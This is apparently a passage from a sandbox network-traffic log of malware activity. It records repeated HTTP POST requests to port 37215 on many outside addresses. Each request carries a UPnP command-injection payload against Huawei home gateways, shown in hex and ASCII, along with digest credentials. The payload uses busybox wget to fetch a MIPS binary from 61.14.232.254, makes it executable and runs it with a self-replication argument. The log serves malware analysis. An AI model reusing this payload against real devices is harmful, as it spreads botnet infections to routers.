2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1980192.168.2.133968032.101.121.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685743093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1981192.168.2.1353954197.212.184.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685787916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1982192.168.2.1337668157.35.227.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685797930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1983192.168.2.1337608197.205.24.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685797930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1984192.168.2.135500895.48.125.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685830116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1985192.168.2.133702052.12.230.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685842991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1986192.168.2.133778241.103.31.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.685961008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1987192.168.2.1338492197.226.180.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686248064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1988192.168.2.1351292157.18.19.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686274052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1989192.168.2.1347350197.95.63.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686301947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1990192.168.2.134909841.216.238.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.686342955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
